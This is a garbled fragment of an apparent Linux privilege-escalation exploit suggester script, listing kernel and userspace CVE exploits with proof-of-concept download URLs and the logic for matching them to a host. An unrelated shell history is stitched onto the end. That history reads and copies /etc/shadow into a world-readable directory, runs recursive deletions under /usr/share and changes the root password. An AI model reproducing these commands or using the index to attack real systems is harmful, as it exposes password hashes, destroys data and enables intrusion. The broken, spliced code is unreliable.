https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-1000112/poc.c Comments: CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP/KASLR bypass included. Modified version at 'ext-url' adds support for additional distros/kernels bin-url: https://raw.githubusercontent.com/rapid7/metasploit-framework/master/data/exploits/cve-2017-1000112/exploit.out exploit-db: author: Andrey 'xairy' Konovalov (orginal exploit author); Brendan Coles (author of exploit update at 'ext-url') EOF ) EXPLOITS[((n++))]=$(cat <=3.2,ver<=4.13,x86_64 Tags: RHEL=6,RHEL=7{kernel:3.10.0-514.21.2|3.10.0-514.26.1} Rank: 1 analysis-url: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.txt src-url: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.c exploit-db: 42887 author: Qualys Comments: EOF ) EXPLOITS[((n++))]=$(cat <=4.4,ver<=4.14.13,cmd:grep -qi rds /proc/modules,x86_64 Tags: ubuntu=16.04{kernel:4.4.0|4.8.0} Rank: 1 src-url: https://gist.githubusercontent.com/wbowling/9d32492bd96d9e7c3bf52e23a0ac30a4/raw/959325819c78248a6437102bb289bb8578a135cd/cve-2018-5333-poc.c ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2018-5333/cve-2018-5333.c Comments: rds.ko kernel module needs to be loaded. Modified version at 'ext-url' adds support for additional targets and bypassing KASLR. author: wbowling (orginal exploit author); bcoles (author of exploit update at 'ext-url') EOF ) EXPLOITS[((n++))]=$(cat <=4.15,ver<=4.19.2,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1,cmd:[ -u /usr/bin/newuidmap ],cmd:[ -u /usr/bin/newgidmap ] Tags: ubuntu=18.04{kernel:4.15.0-20-generic},fedora=28{kernel:4.16.3-301.fc28} Rank: 1 analysis-url: https://bugs.chromium.org/p/project-zero/issues/detail?id=1712 src-url: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45886.zip exploit-db: 45886 author: Jann Horn Comments: CONFIG_USER_NS needs to be enabled EOF ) EXPLOITS[((n++))]=$(cat <=4,ver<5.1.17,sysctl:kernel.yama.ptrace_scope==0,x86_64 Tags: ubuntu=16.04{kernel:4.15.0-*},ubuntu=18.04{kernel:4.15.0-*},debian=9{kernel:4.9.0-*},debian=10{kernel:4.19.0-*},fedora=30{kernel:5.0.9-*} Rank: 1 analysis-url: https://bugs.chromium.org/p/project-zero/issues/detail?id=1903 src-url: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47133.zip ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2019-13272/poc.c Comments: Requires an active PolKit agent. exploit-db: 47133 exploit-db: 47163 author: Jann Horn (orginal exploit author); bcoles (author of exploit update at 'ext-url') EOF ) EXPLOITS[((n++))]=$(cat <=3,ver<5.0.19,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1,CONFIG_XFRM=y Tags: Rank: 1 analysis-url: https://duasynt.com/blog/ubuntu-centos-redhat-privesc bin-url: https://github.com/duasynt/xfrm_poc/raw/master/lucky0 Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled author: Vitaly 'vnik' Nikolenko EOF ) ############ USERSPACE EXPLOITS ########################### n=0 EXPLOITS_USERSPACE[((n++))]=$(cat <=1.8.0,ver<=1.8.3 Tags: fedora=16 Rank: 1 analysis-url: http://seclists.org/fulldisclosure/2012/Jan/att-590/advisory_sudo.txt exploit-db: 18436 EOF ) EXPLOITS_USERSPACE[((n++))]=$(cat <=2.13,ver<=2.17,cmd:grep -qi apport /proc/sys/kernel/core_pattern Tags: ubuntu=14.04 Rank: 1 analysis-url: http://openwall.com/lists/oss-security/2015/04/14/4 src-url: https://gist.githubusercontent.com/taviso/0f02c255c13c5c113406/raw/eafac78dce51329b03bea7167f1271718bee4dcc/newpid.c exploit-db: 36746 EOF ) EXPLOITS_USERSPACE[((n++))]=$(cat <=2.13,ver<=2.17,cmd:grep -qi apport /proc/sys/kernel/core_pattern Tags: ubuntu=14.04.2 Rank: 1 analysis-url: http://openwall.com/lists/oss-security/2015/04/14/4 exploit-db: 36782 EOF ) EXPLOITS_USERSPACE[((n++))]=$(cat <=6.8,ver<=6.9 Tags: Rank: 1 analysis-url: http://www.openwall.com/lists/oss-security/2017/01/26/2 exploit-db: 41173 author: Federico Bento Comments: Needs admin interaction (root user needs to login via ssh to trigger exploitation) EOF ) EXPLOITS_USERSPACE[((n++))]=$(cat <=4.87,ver<=4.91 Tags: Rank: 1 analysis-url: https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt exploit-db: 46996 author: raptor EOF ) EXPLOITS_USERSPACE[((n++))]=$(cat <=4.15 enabled: cmd:grep -Eqi '\spti' /proc/cpuinfo analysis-url: https://github.com/mzet-/les-res/blob/master/features/pti.md EOF ) FEATURES[((n++))]=$(cat <=3.14 analysis-url: https://github.com/mzet-/les-res/blob/master/features/stackprotector-strong.md EOF ) FEATURES[((n++))]=$(cat <=2.6.37 enabled: sysctl:kernel.dmesg_restrict!=0 analysis-url: https://github.com/mzet-/les-res/blob/master/features/dmesg_restrict.md EOF ) FEATURES[((n++))]=$(cat <=3.0 enabled: cmd:grep -qi smep /proc/cpuinfo analysis-url: https://github.com/mzet-/les-res/blob/master/features/smep.md EOF ) FEATURES[((n++))]=$(cat <=3.7 enabled: cmd:grep -qi smap /proc/cpuinfo analysis-url: https://github.com/mzet-/les-res/blob/master/features/smap.md EOF ) FEATURES[((n++))]=$(cat < - provide kernel version"; echo " -u | --uname - provide 'uname -a' string"; echo " --skip-more-checks - do not perform additional checks (kernel config, sysctl) to determine if exploit is applicable"; echo " --skip-pkg-versions - skip checking for exact userspace package version (helps to avoid false negatives)"; echo " -p | --pkglist-file - provide file with 'dpkg -l' or 'rpm -qa' command output"; echo " --cvelist-file - provide file with Linux kernel CVEs list"; echo " --checksec - list security related features for your HW/kernel"; echo " -s | --fetch-sources - automatically downloads source for matched exploit"; echo " -b | --fetch-binaries - automatically downloads binary for matched exploit if available"; echo " -f | --full - show full info about matched exploit"; echo " -g | --short - show shorten info about matched exploit"; echo " --kernelspace-only - show only kernel vulnerabilities"; echo " --userspace-only - show only userspace vulnerabilities"; echo " -d | --show-dos - show also DoSes in results"; } exitWithErrMsg() { echo "$1" 1>&2; exit 1; } # extracts all information from output of 'uname -a' command parseUname() { local uname=$1; KERNEL=$(echo "$uname" | awk '{print $3}' | cut -d '-' -f 1); KERNEL_ALL=$(echo "$uname" | awk '{print $3}'); ARCH=$(echo "$uname" | awk '{print $(NF-1)}'); OS=""; echo "$uname" | grep -q -i 'deb' && OS="debian"; echo "$uname" | grep -q -i 'ubuntu' && OS="ubuntu"; echo "$uname" | grep -q -i '\-ARCH' && OS="arch"; echo "$uname" | grep -q -i '\-deepin' && OS="deepin"; echo "$uname" | grep -q -i '\-MANJARO' && OS="manjaro"; echo "$uname" | grep -q -i '\.fc' && OS="fedora"; echo "$uname" | grep -q -i '\.el' && OS="RHEL"; echo "$uname" | grep -q -i '\.mga' && OS="mageia"; } getPkgList() { local distro=$1; local pkglist_file=$2; if [ "$opt_pkglist_file" = "true" -a -e "$pkglist_file" ]; then if [ $(head -1 "$pkglist_file" | grep 'Desired=Unknown/Install/Remove/Purge/Hold') ]; then PKG_LIST=$(cat "$pkglist_file" | awk '{print $2"-"$3}' | sed 's/:amd64//g'); OS="debian"; [ "$(grep ubuntu "$pkglist_file")" ] && OS="ubuntu" elif [ "$(grep -E '\.el[1-9]+[\._]' "$pkglist_file" | head -1)" ]; then PKG_LIST=$(cat "$pkglist_file"); OS="RHEL" elif [ "$(grep -E '\.fc[1-9]+'i "$pkglist_file" | head -1)" ]; then PKG_LIST=$(cat "$pkglist_file"); OS="fedora" elif [ "$(grep -E '\.mga[1-9]+' "$pkglist_file" | head -1)" ]; then PKG_LIST=$(cat "$pkglist_file"); OS="mageia" elif [ "$(grep -E '\ [0-9]+\.' "$pkglist_file" | head -1)" ]; then PKG_LIST=$(cat "$pkglist_file" | awk '{print $1"-"$2}'); OS="arch" else PKG_LIST=""; fi; elif [ "$distro" = "debian" -o "$distro" = "ubuntu" -o "$distro" = "deepin" ]; then PKG_LIST=$(dpkg -l | awk '{print $2"-"$3}' | sed 's/:amd64//g'); elif [ "$distro" = "RHEL" -o "$distro" = "fedora" -o "$distro" = "mageia" ]; then PKG_LIST=$(rpm -qa); elif [ "$distro" = "arch" -o "$distro" = "manjaro" ]; then PKG_LIST=$(pacman -Q | awk '{print $1"-"$2}'); elif [ -x /usr/bin/equery ]; then PKG_LIST=$(/usr/bin/equery --quiet list '*' -F '$name:$version' | cut -d/ -f2- | awk '{print $1":"$2}'); else PKG_LIST=""; fi; } # from: https://stackoverflow.com/questions/4023830/how-compare-two-strings-in-dot-separated-version-format-in-bash verComparision() { if [[ $1 == $2 ]]; then return 0; fi; local IFS=.; local i ver1=($1) ver2=($2); for ((i=${#ver1[@]}; i<${#ver2[@]}; i++)); do ver1[i]=0; done; for ((i=0; i<${#ver1[@]}; i++)); do if [[ -z ${ver2[i]} ]]; then ver2[i]=0; fi; if ((10#${ver1[i]} > 10#${ver2[i]})); then return 1; fi; if ((10#${ver1[i]} < 10#${ver2[i]})); then return 2; fi; done; return 0; } doVersionComparision() { local reqVersion="$1"; local reqRelation="$2"; local currentVersion="$3"; verComparision $currentVersion $reqVersion; case $? in 0) currentRelation='=';; 1) currentRelation='>';; 2) currentRelation='<';; esac; if [ "$reqRelation" == "=" ]; then [ $currentRelation == "=" ] && return 0; elif [ "$reqRelation" == ">" ]; then [ $currentRelation == ">" ] && return 0; elif [ "$reqRelation" == "<" ]; then [ $currentRelation == "<" ] && return 0; elif [ "$reqRelation" == ">=" ]; then [ $currentRelation == "=" ] && return 0; [ $currentRelation == ">" ] && return 0; elif [ "$reqRelation" == "<=" ]; then [ $currentRelation == "=" ] && return 0; [ $currentRelation == "<" ] && return 0; fi; } compareValues() { curVal=$1; val=$2; sign=$3; if [ "$sign" == "==" ]; then [ "$val" == "$curVal" ] && return 0; elif [ "$sign" == "!=" ]; then [ "$val" != "$curVal" ] && return 0; fi; return 1; } checkRequirement() { local IN="$1"; local pkgName="${2:4}"; if [[ "$IN" =~ ^pkg=.*$ ]]; then [ ${pkgName} == "linux-kernel" ] && return 0; pkg=$(echo "$PKG_LIST" | grep -E -i "^$pkgName-[0-9]+" | head -1); if [ -n "$pkg" ]; then return 0; fi; elif [[ "$IN" =~ ^ver.*$ ]]; then version="${IN//[^0-9.]/}"; rest="${IN#ver}"; operator=${rest%$version}; if [ "$pkgName" == "linux-kernel" -o "$opt_checksec_mode" == "true" ]; then [ "$opt_cvelist_file" = "true" ] && return 0; doVersionComparision $version $operator $KERNEL && return 0; else pkg=$(echo "$PKG_LIST" | grep -E -i "^$pkgName-[0-9]+" | head -1); [ "$opt_skip_pkg_versions" = "true" -a -n "$pkg" ] && return 0; pkgVersion=$(echo "$pkg" | grep -E -i -o -e '-[\.0-9\+:p]+[-\+]' | cut -d':' -f2 | sed 's/[\+-]//g' | sed 's/p[0-9]//g') doVersionComparision $version $operator $pkgVersion && return 0; fi; elif [[ "$IN" =~ ^x86_64$ ]] && [ "$ARCH" == "x86_64" -o "$ARCH" == "" ]; then return 0; elif [[ "$IN" =~ ^x86$ ]] && [ "$ARCH" == "i386" -o "$ARCH" == "i686" -o "$ARCH" == "" ]; then return 0; elif [[ "$IN" =~ ^CONFIG_.*$ ]]; then [ "$opt_skip_more_checks" = "true" ] && return 0; if [ -n "$KCONFIG" ]; then if $KCONFIG | grep -E -qi $IN; then return 0; else return 1; fi else return 0; fi; elif [[ "$IN" =~ ^sysctl:.*$ ]]; then [ "$opt_skip_more_checks" = "true" ] && return 0; sysctlCondition="${IN:7}"; if echo $sysctlCondition | grep -qi "!="; then sign="!="; elif echo $sysctlCondition | grep -qi "=="; then sign="=="; else exitWithErrMsg "Wrong sysctl condition. There is syntax error in your features DB. Aborting."; fi; val=$(echo "$sysctlCondition" | awk -F "$sign" '{print $2}'); entry=$(echo "$sysctlCondition" | awk -F "$sign" '{print $1}'); curVal=$(/sbin/sysctl -a 2> /dev/null | grep "$entry" | awk -F'=' '{print $2}'); [ -z "$curVal" -a "$opt_checksec_mode" = "true" ] && return 2; [ -z "$curVal" ] && return 0; compareValues $curVal $val $sign && return 0; elif [[ "$IN" =~ ^cmd:.*$ ]]; then [ "$opt_skip_more_checks" = "true" ] && return 0; cmd="${IN:4}"; if eval "${cmd}"; then return 0; fi; fi; return 1; } getKernelConfig() { if [ -f /proc/config.gz ] ; then KCONFIG="zcat /proc/config.gz"; elif [ -f /boot/config-`uname -r` ] ; then KCONFIG="cat /boot/config-`uname -r`"; elif [ -f "${KBUILD_OUTPUT:-/usr/src/linux}"/.config ] ; then KCONFIG="cat ${KBUILD_OUTPUT:-/usr/src/linux}/.config"; else KCONFIG=""; fi; } checksecMode() { MODE=0; for FEATURE in "${FEATURES[@]}"; do i=0 while read -r line; do arr[i]="$line"; i=$((i + 1)) done <<< "$FEATURE"; NAME="${arr[0]}"; PRE_NAME="${NAME:0:8}"; NAME="${NAME:9}"; if [ "${PRE_NAME}" = "section:" ]; then advance to next MODE; + 1)) echo echo -e "${bldwht}${NAME}${txtrst}" echo continue fi AVAILABLE="${arr[1]}" && AVAILABLE="${AVAILABLE:11}" ENABLE=$(echo "$FEATURE" | grep "enabled: " | awk -F'ed: ' '{print $2}') analysis_url=$(echo "$FEATURE" | grep "analysis-url: " | awk '{print $2}') # split line with availability requirements & loop thru all availability reqs one by one & check whether it is met IFS=',' read -r -a array <<< "$AVAILABLE" AVAILABLE_REQS_NUM=${#array[@]} AVAILABLE_PASSED_REQ=0 CONFIG="" for REQ in "${array[@]}"; do find CONFIG_ name (if present) for current feature (only for display purposes) [ -z "$CONFIG" ]; then fig=$(echo "$REQ" | grep "CONFIG_") -n "$config" ] && CONFIG="($(echo $REQ | cut -d'=' -f1))" if (checkRequirement "$REQ"); then AVAILABLE_PASSED_REQ=$(($AVAILABLE_PASSED_REQ + 1)); else break; fi done # split line with enablement requirements & loop thru all enablement reqs one by one & check whether it is met ENABLE_PASSED_REQ=0 ENABLE_REQS_NUM=0 noSysctl=0 if [ -n "$ENABLE" ]; then IFS=',' read -r -a array <<< "$ENABLE"; ENABLE_REQS_NUM=${#array[@]}; for REQ in "${array[@]}"; do cmdStdout=$(checkRequirement "$REQ"); retVal=$?; if [ $retVal -eq 0 ]; then ENABLE_PASSED_REQ=$(($ENABLE_PASSED_REQ + 1)); elif [ $retVal -eq 2 ]; then noSysctl=1; break; else break; fi; done; fi feature=$(echo "$FEATURE" | grep "feature: " | cut -d' ' -f 2-) if [ -n "$cmdStdout" ]; then if [ "$cmdStdout" -eq 0 ]; then state="[ ${txtred}Set to $cmdStdout${txtrst} ]"; else state="[ ${txtgrn}Set to $cmdStdout${txtrst} ]"; fi; else unknown="[ ${txtgray}Unknown${txtrst} ]"; if [ $MODE -eq 3 ]; then enabled="[ ${txtgrn}Enabled${txtrst} ]"; disabled="[ ${txtgray}N/A${txtrst} ]"; elif [ $MODE -eq 4 ]; then enabled="[ ${txtred}Exposed${txtrst} ]"; disabled="[ ${txtgrn}Locked${txtrst} ]"; else abled="[ ${txtgrn}Enabled${txtrst} ]"; ${txtred}Disabled${txtrst} ]" fi if [ -z "$KCONFIG" -a "$ENABLE_REQS_NUM" = 0 ]; then state=$unknown elif [ $AVAILABLE_PASSED_REQ -eq $AVAILABLE_REQS_NUM -a $ENABLE_PASSED_REQ -eq $ENABLE_REQS_NUM ]; then state=$enabled else state=$disabled fi fi echo -e " $state $feature ${wht}${CONFIG}${txtrst}" [ -n "$analysis_url" ] && echo -e " $analysis_url" echo done } displayExposure() { RANK=$1 if [ "$RANK" -ge 6 ]; then echo "highly probable" elif [ "$RANK" -ge 3 ]; then echo "probable" else echo "less probable" fi } # parse command line parameters ARGS=$(getopt --options $SHORTOPTS --longoptions $LONGOPTS -- "$@") [ $? != 0 ] && exitWithErrMsg "Aborting." eval set -- "$ARGS" while true; do case "$1" in -u|--uname) shift UNAME_A="$1" opt_uname_string=true ;; -V|--version) version exit 0 ;; -h|--help) usage exit 0 ;; -f|--full) opt_full=true ;; -g|--short) opt_summary=true ;; -b|--fetch-binaries) opt_fetch_bins=true ;; -s|--fetch-sources) opt_fetch_srcs=true ;; -k|--kernel) shift KERNEL="$1" opt_kernel_version=true ;; -d|--show-dos) opt_show_dos=true ;; -p|--pkglist-file) shift PKGLIST_FILE="$1" opt_pkglist_file=true ;; --cvelist-file) shift CVELIST_FILE="$1" opt_cvelist_file=true ;; --checksec) opt_checksec_mode=true ;; --kernelspace-only) opt_kernel_only=true ;; --userspace-only) opt_userspace_only=true ;; --skip-more-checks) opt_skip_more_checks=true ;; --skip-pkg-versions) opt_skip_pkg_versions=true ;; *) shift if [ "$#" != "0" ]; then exitWithErrMsg "Unknown option '$1'. Aborting." fi break ;; esac shift done # check Bash version (associative arrays need Bash in version 4.0+) if ((BASH_VERSINFO[0] < 4)); then exitWithErrMsg "Script needs Bash in version 4.0 or newer. Aborting." fi # exit if both --kernel and --uname are set [ "$opt_kernel_version" = "true" ] && [ $opt_uname_string = "true" ] && exitWithErrMsg "Switches -u|--uname and -k|--kernel are mutually exclusive. Aborting." # exit if both --full and --short are set [ "$opt_full" = "true" ] && [ $opt_summary = "true" ] && exitWithErrMsg "Switches -f|--full and -g|--short are mutually exclusive. Aborting." # --cvelist-file mode is standalone mode and is not applicable when one of -k | -u | -p | --checksec switches are set if [ "$opt_cvelist_file" = "true" ]; then [ ! -e "$CVELIST_FILE" ] && exitWithErrMsg "Provided CVE list file does not exists. Aborting." [ "$opt_kernel_version" = "true" ] && exitWithErrMsg "Switches -k|--kernel and --cvelist-file are mutually exclusive. Aborting." [ "$opt_uname_string" = "true" ] && exitWithErrMsg "Switches -u|--uname and --cvelist-file are mutually exclusive. Aborting." [ "$opt_pkglist_file" = "true" ] && exitWithErrMsg "Switches -p|--pkglist-file and --cvelist-file are mutually exclusive. Aborting." fi # --checksec mode is standalone mode and is not applicable when one of -k | -u | -p | --cvelist-file switches are set if [ "$opt_checksec_mode" = "true" ]; then [ "$opt_kernel_version" = "true" ] && exitWithErrMsg "Switches -k|--kernel and --checksec are mutually exclusive. Aborting." [ "$opt_uname_string" = "true" ] && exitWithErrMsg "Switches -u|--uname and --checksec are mutually exclusive. Aborting." [ "$opt_pkglist_file" = "true" ] && exitWithErrMsg "Switches -p|--pkglist-file and --checksec are mutually exclusive. Aborting." fi # extract kernel version and other OS info like distro name, distro version, etc. 3 possibilities here: # case 1: --kernel set if [ "$opt_kernel_version" == "true" ]; then # TODO: add kernel version number validation [ -z "$KERNEL" ] && exitWithErrMsg "Unrecognized kernel version given. Aborting." ARCH="" OS="" # do not perform additional checks on current machine opt_skip_more_checks=true # do not consider current OS getPkgList "" "$PKGLIST_FILE" # case 2: --uname set elif [ "$opt_uname_string" == "true" ]; then [ -z "$UNAME_A" ] && exitWithErrMsg "uname string empty. Aborting." parseUname "$UNAME_A" # do not perform additional checks on current machine opt_skip_more_checks=true # do not consider current OS getPkgList "" "$PKGLIST_FILE" # case 3: --cvelist-file mode elif [ "$opt_cvelist_file" = "true" ]; then # get kernel configuration in this mode [ "$opt_skip_more_checks" = "false" ] && getKernelConfig # case 4: --checksec mode elif [ "$opt_checksec_mode" = "true" ]; then # this switch is not applicable in this mode opt_skip_more_checks=false # get kernel configuration in this mode getKernelConfig [ -z "$KCONFIG" ] && echo "WARNING. Kernel Config not found on the system results won't be complete." # launch checksec mode checksecMode exit 0 # case 5: no --uname | --kernel | --cvelist-file | --checksec set else # --pkglist-file NOT provided: take all info from current machine # case for vanilla execution: ./linux-exploit-suggester.sh if [ "$opt_pkglist_file" == "false" ]; then UNAME_A=$(uname -a) [ -z "$UNAME_A" ] && exitWithErrMsg "uname string empty. Aborting." parseUname "$UNAME_A" # get kernel configuration in this mode [ "$opt_skip_more_checks" = "false" ] && getKernelConfig # extract distribution version from /etc/os-release OR /etc/lsb-release [ -n "$OS" -a "$opt_skip_more_checks" = "false" ] && DISTRO=$(grep -s -E '^DISTRIB_RELEASE=|^VERSION_ID=' /etc/*-release | cut -d'=' -f2 | head -1 | tr -d '"') # extract package listing from current OS getPkgList "$OS" "" # --pkglist-file provided: only consider userspace exploits against provided package listing else KERNEL="" #TODO: extract machine arch from package listing ARCH="" unset EXPLOITS declare -A EXPLOITS getPkgList "" "$PKGLIST_FILE" # additional checks are not applicable for this mode opt_skip_more_checks=true fi fi echo echo -e "${bldwht}Available information:${txtrst}" echo [ -n "$KERNEL" ] && echo -e "Kernel version: ${txtgrn}$KERNEL${txtrst}" || echo -e "Kernel version: ${txtred}N/A${txtrst}" echo "Architecture: $([ -n "$ARCH" ] && echo -e "${txtgrn}$ARCH${txtrst}" || echo -e "${txtred}N/A${txtrst}")" echo "Distribution: $([ -n "$OS" ] && echo -e "${txtgrn}$OS${txtrst}" || echo -e "${txtred}N/A${txtrst}")" echo -e "Distribution version: $([ -n "$DISTRO" ] && echo -e "${txtgrn}$DISTRO${txtrst}" || echo -e "${txtred}N/A${txtrst}")" echo "Additional checks (CONFIG_*, sysctl entries, custom Bash commands): $([ "$opt_skip_more_checks" == "false" ] && echo -e "${txtgrn}performed${txtrst}" || echo -e "${txtred}N/A${txtrst}")" if [ -n "$PKGLIST_FILE" -a -n "$PKG_LIST" ]; then pkgListFile="${txtgrn}$PKGLIST_FILE${txtrst}"; elif [ -n "$PKGLIST_FILE" ]; then pkgListFile="${txtred}unrecognized file provided${txtrst}"; elif [ -n "$PKG_LIST" ]; then pkgListFile="${txtgrn}from current OS${txtrst}"; fi echo -e "Package listing: $([ -n "$pkgListFile" ] && echo -e "$pkgListFile" || echo -e "${txtred}N/A${txtrst}")" # handle --kernelspacy-only & --userspace-only filter options if [ "$opt_kernel_only" = "true" -o -z "$PKG_LIST" ]; then unset EXPLOITS_USERSPACE; declare -A EXPLOITS_USERSPACE; fi if [ "$opt_userspace_only" = "true" ]; then unset EXPLOITS; declare -A EXPLOITS; fi echo echo -e "${bldwht}Searching among:${txtrst}" echo echo "${#EXPLOITS[@]} kernel space exploits" echo "${#EXPLOITS_USERSPACE[@]} user space exploits" echo echo -e "${bldwht}Possible Exploits:${txtrst}" echo # start analysis j=0 for EXP in "${EXPLOITS[@]}" "${EXPLOITS_USERSPACE[@]}"; do i=0 while read -r line; do arr[i]="$line"; i=$((i + 1)) done <<< "$EXP"; NAME="${arr[0]}" && NAME="${NAME:6}"; REQS="${arr[1]}" && REQS="${REQS:6}"; TAGS="${arr[2]}" && TAGS="${TAGS:6}"; RANK="${arr[3]}" && RANK="${RANK:6}"; IFS=',' read -r -a array <<< "$REQS"; REQS_NUM=${#array[@]}; PASSED_REQ=0; for REQ in "${array[@]}"; do if (checkRequirement "$REQ" "${array[0]}"); then PASSED_REQ=$(($PASSED_REQ + 1)); else break; fi; done; if [ $PASSED_REQ -eq $REQS_NUM ]; then if [ "$opt_cvelist_file" = "true" ]; then cve=$(echo "$NAME" | grep '.*\[.*\].*' | cut -d 'm' -f2 | cut -d ']' -f1 | tr -d '[' | tr "," "|") [ ! $(cat "$CVELIST_FILE" | grep -E "$cve") ] && continue; fi; tags=""; if [ -n "$TAGS" -a -n "$OS" ]; then IFS=',' read -r -a tags_array <<< "$TAGS"; TAGS_NUM=${#tags_array[@]}; [ "$(echo "${tags_array[@]}" | grep "$OS")" -a "$opt_uname_string" == "true" ] && RANK=$(($RANK + 1)); for TAG in "${tags_array[@]}"; do tag_distro=$(echo "$TAG" | cut -d'=' -f1); tag_distro_num_all=$(echo "$TAG" | cut -d'=' -f2) tag_distro_num="${tag_distro_num_all%{*}"; if [ "$opt_uname_string" == "true" -o \( "$OS" == "$tag_distro" -a "$(echo "$DISTRO" | grep -E "$tag_distro_num")" \) ]; then [ "$opt_uname_string" == "false" ] && RANK=$(($RANK + 2)); tag_pkg=$(echo "$tag_distro_num_all" | cut -d'{' -f 2 | tr -d '}' | cut -d':' -f 1); tag_pkg_num=""; [ $(echo "$tag_distro_num_all" | grep '{') ] && tag_pkg_num=$(echo "$tag_distro_num_all" | cut -d'{' -f 2 | tr -d '}' | cut -d':' -f 2); if [ -z "$tag_pkg_num" ]; then [ "$opt_uname_string" == "false" ] && TAG="${lightyellow}[ ${TAG} ]${txtrst}"; elif [ -n "$tag_pkg_num" -a "$tag_pkg" = "kernel" ]; then if [ $(echo "$KERNEL_ALL" | grep -E "${tag_pkg_num}") ]; then TAG="${yellow}[ ${TAG} ]${txtrst}"; RANK=$(($RANK + 3)); else [ "$opt_uname_string" == "false" ] && TAG="${lightyellow}[ $tag_distro=$tag_distro_num ]${txtrst}{kernel:$tag_pkg_num}"; fi; elif [ -n "$tag_pkg_num" -a -n "$tag_pkg" ]; then TAG="${lightyellow}[ $tag_distro=$tag_distro_num ]${txtrst}{$tag_pkg:$tag_pkg_num}"; fi; fi; tags="${tags}${TAG},"; done [ -n "$tags" ] && tags="${tags%?}"; else tags="$TAGS"; fi; EXP=$(echo "$EXP" | sed -e '/^Name:/d' -e '/^Reqs:/d' -e '/^Tags:/d'); exploits_to_sort[j]="${RANK}Name: ${NAME}D3L1mReqs: ${REQS}D3L1mTags: ${tags}D3L1m$(echo "$EXP" | sed -e ':a' -e 'N' -e '$!ba' -e 's/\n/D3L1m/g')"; ((j++)); fi; done clear vi prueba.sh ls chmod 777 prueba.sh sh prueba.sh ls echo "Noobs{0..99999}" > noobs{0..99999} ls cat prueba.sh ./prueba ls. ./prueba.sh echo "Noobs{0..99999}" >> noobs{0..99999} echo "Noobs{0..99999}" >> noobs ls cat noobs echo "Noobs" >> noobs{0..712} echo "Noobs" >> noobs0 echo "Noobs" >> noobs1 echo "Noobs" >> noobs2 echo "Noobs" >> noobs3 echo "Noobs" >> noobs4 echo "Noobs" >> noobs5 echo "Noobs" >> noobs6 rm * rm -rf * ls cat test.sh exit ls ls -la cat .bash_history ls ls -l ls -la nano .bomba.c.swp cat .bomba.c.swp uname -a cat /etc/*release* cat /etc/passwd uname -a ls /bin pwd which pwd ls /usr/bin ls /usr/bin/ ls /usr/bin/* file /usr/bin/* file /usr/bin/pwd cat /etc/shells ls pwd ls -la cat .xds.hj.swp exit ls caf les.sh cat les.sh wc -l les.sh ls cd test ls vi vim vi xds.hj vi test.sh ls chmod 777 test.sh ./test.sh ls ls -la sh test sh test.sh 18 more /var/mail ls /var/mail ls /var/mail/usuario ls /var/mail/usuario/ ls /var/mail/usuario ls -la /var/mail/usuario more /var/mail/usuario cd /etc/rc.d/init.d ls cd functions LS more functions clear ls cd /home ls cd usuario/ ls sh test sh test.sh su adm cat /etc/os-release clear su passwd root sudo passwd root reboot sudo reboot clear whoami su - usermod -aG sudo usuario grep '^sudo' /etc/group screenfetch neofetch tip top htop clear ls cd cd.. cd / cd /etc/ ls cd cd /usr/ ls cd /usr/share/ ls rm -rf */ ls rm -rf * clear ls rm -rf zsh ls clear ls cd zsh ls cd site-functioms cd site-functions ls cat _loginctl zsh cd . cd .. ls cd.. cd .. ls cd .. ls cd .. clear cat /etc/passwd cat /etc/shadow cat /etc/shadow/ cat /etc/ cat /etc/ls cat /etc/ & ls cat /etc/passwd sudo su su clear tail /etc/passwd tail /etc/shadow cp /etc/shadow /usr/share/ clear exit ls uname -a ls cd / ls ls -la cd ls pwd cd .. ls ls /var ls / df fdisk cat /proc/cpuinfo ls cd .. ls ifconfig ip sudo su exit ps ax w history cp /etc/shadow /usr/share/ ls /usr/bin/* w vi .bash_history ls ll cd ls ps ax cd /tmp ls cat 2 ll vi 2 cat 2 ls ps ax h sudo sudo su ps ax ls top find / find /bin find / -name find -name / ls w top lscpu ps ax ls cd lost+found/ ll exit ls -l pwd cd / ls -l uname -a exit